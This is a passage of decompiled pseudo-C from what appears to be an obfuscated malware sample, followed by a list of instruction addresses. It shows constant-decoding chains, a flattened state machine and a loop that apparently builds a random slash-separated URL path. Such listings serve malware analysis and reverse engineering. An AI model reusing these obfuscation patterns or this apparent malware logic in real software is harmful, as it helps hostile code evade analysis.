				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0020602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002029E3(_t950 + 0x274, 0x400, E0021889D(0x21c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00212025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0020F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0020839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0020C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002096CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0020F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002178B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00208736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00216B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0020F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00219B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0021889D(0x21c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x21ca38; // 0x0
														_t790 =  *0x21ca38; // 0x0
														_t793 =  *0x21ca38; // 0x0
														E00217C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00212025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x21ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0021511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0020D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0020F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00218C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0020F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0020F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

0x00209fe6
0x00209fed
0x00209ff6
0x00209ffe
0x0020a005
0x0020a006
0x0020a00d
0x0020a00e
0x0020a00f
0x0020a014
0x0020a01f
0x0020a022
0x0020a02d
0x0020a02f
0x0020a038
0x0020a043
0x0020a048
0x0020a053
0x0020a067
0x0020a06c
0x0020a075
0x0020a080
0x0020a092
0x0020a097
0x0020a0a0
0x0020a0ab
0x0020a0b6
0x0020a0be
0x0020a0c6
0x0020a0ce
0x0020a0d9
0x0020a0e4
0x0020a0ec
0x0020a0f7
0x0020a102
0x0020a10d
0x0020a118
0x0020a120
0x0020a129
0x0020a12e
0x0020a134
0x0020a13c
0x0020a147
0x0020a152
0x0020a15a
0x0020a165
0x0020a177
0x0020a17a
0x0020a181
0x0020a188
0x0020a193
0x0020a19b
0x0020a1a0
0x0020a1a8
0x0020a1b0
0x0020a1b8
0x0020a1c0
0x0020a1ca
0x0020a1ce
0x0020a1d4
0x0020a1dc
0x0020a1e7
0x0020a1ef
0x0020a1fa
0x0020a202
0x0020a206
0x0020a20a
0x0020a20f
0x0020a217
0x0020a222
0x0020a22a
0x0020a232
0x0020a23d
0x0020a248
0x0020a253
0x0020a25e
0x0020a269
0x0020a271
0x0020a27c
0x0020a287
0x0020a292
0x0020a29a
0x0020a2a5
0x0020a2b0
0x0020a2bb
0x0020a2c6
0x0020a2db
0x0020a2de
0x0020a2df
0x0020a2e6
0x0020a2f1
0x0020a2fc
0x0020a304
0x0020a30c
0x0020a317
0x0020a32a
0x0020a331
0x0020a33c
0x0020a352
0x0020a359
0x0020a364
0x0020a36f
0x0020a382
0x0020a389
0x0020a394
0x0020a39f
0x0020a3aa
